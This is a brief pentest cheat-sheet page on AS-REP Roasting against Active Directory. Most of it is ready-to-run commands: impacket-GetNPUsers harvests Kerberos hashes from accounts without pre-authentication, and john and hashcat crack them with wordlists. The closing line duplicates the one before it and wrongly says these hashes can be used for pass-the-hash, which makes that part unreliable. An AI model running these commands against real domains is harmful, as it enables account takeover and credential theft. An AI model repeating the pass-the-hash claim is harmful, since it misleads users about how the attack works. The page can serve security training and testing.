AS-REP Roasting
Last modified: 2022-12-30
AS-REP Roasting is a technique that retrieves password hashes for accounts that do not require Kerberos pre-authentication in Active Directory.
Enumeration
List users that do not require Kerberos pre-authentication, along with their password hashes. Used for AS-REP Roasting.
# Find password hashes for the given users
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
# Find the password hash of a given user
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat
If we find a password hash, crack it.
john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt
If we find a password hash, crack it or use it to log in with pass-the-hash.